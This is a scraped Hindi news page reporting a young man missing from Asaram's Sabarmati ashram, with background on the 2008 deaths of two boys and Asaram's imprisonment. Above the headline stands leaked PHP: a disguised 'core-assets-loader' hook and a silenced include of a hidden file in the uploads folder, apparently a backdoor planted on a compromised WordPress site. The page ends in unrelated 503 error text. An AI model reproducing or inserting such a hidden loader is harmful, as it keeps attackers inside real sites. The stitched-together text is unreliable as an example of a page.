add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); हैदराबाद से साबरमती आया था 27 साल का लड़का, बेटे की तलाश में भटक रहे माता-पिता – SOCH INDIA
Menu

देश
हैदराबाद से साबरमती आया था 27 साल का लड़का, बेटे की तलाश में भटक रहे माता-पिता

nobanner

यौन शौषण केस में जेल में सजा काट रहे आसाराम बापू का अहमदाबाद के साबरमती इलाके में स्थित आश्रम फिर विवादों में आ गया है। हैदराबाद से आश्रम आया एक युवक लापता हो गया है। उसके माता-पिता उसकी तलाश में भटक रहे हैं। आश्रम ने युवक के बारे में कोई जानकारी नहीं दी है। युवक के परिवार ने पुलिस में उसकी गुमशुदगी की शिकायत दर्ज करवाई है।

आसाराम का भक्त 27 वर्षीय राहुल (परिवर्तित नाम) 3 नवंबर को साबरमती इलाके में आसाराम आश्रम अपने दोस्तों के साथ आया था। दोस्त वापस लौट गए थे, लेकिन राहुल यहीं रुक गया था। काफी दिनों तक वह घर नहीं लौटा तो माता-पिता उसकी तलाश में अहमदाबाद पहुंचे और इस तरह उसके लापता होने का खुलासा हुआ।

2008 में दो बच्चों के शव मिले थे
साल 2008 में दीपेश और अभिषेक नाम के दो भाई भी इसी आश्रम से लापता हो गए थे। इसके कुछ दिनों बाद दोनों के शव मिले थे। दोनों भाई आश्रम के गुरुकुल में ही पढ़ाई करते थे। उस समय पुलिस कमिश्नर डी के त्रिवेदी की रिपोर्ट के आधार पर सरकार ने आरोपों की जांच के आदेश दिए थे। हालांकि बच्चों की मौत का राज नहीं खुला। घटना के बाद से ऐसी चर्चा थी कि आश्रम में तंत्र-मंत्र के लिए बच्चों की बलि दे दी गई थी।

जोधपुर की जेल में बंद है आसाराम
जोधपुर पुलिस ने आसाराम बापू को उत्तरप्रदेश में रहने वाले एक व्यक्ति की नाबालिग बेटी के साथ दुष्कर्म करने के मामले में गिरफ्तार किया था। नाबालिग बेटी के माता-पिता आसाराम के भक्त थे। जोधपुर की सेंट्रल जेल में बंद आसाराम पर जातीय उत्पीड़न, हत्या, धमकी देकर जमीन हथियाने के भी आरोप हैं।

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.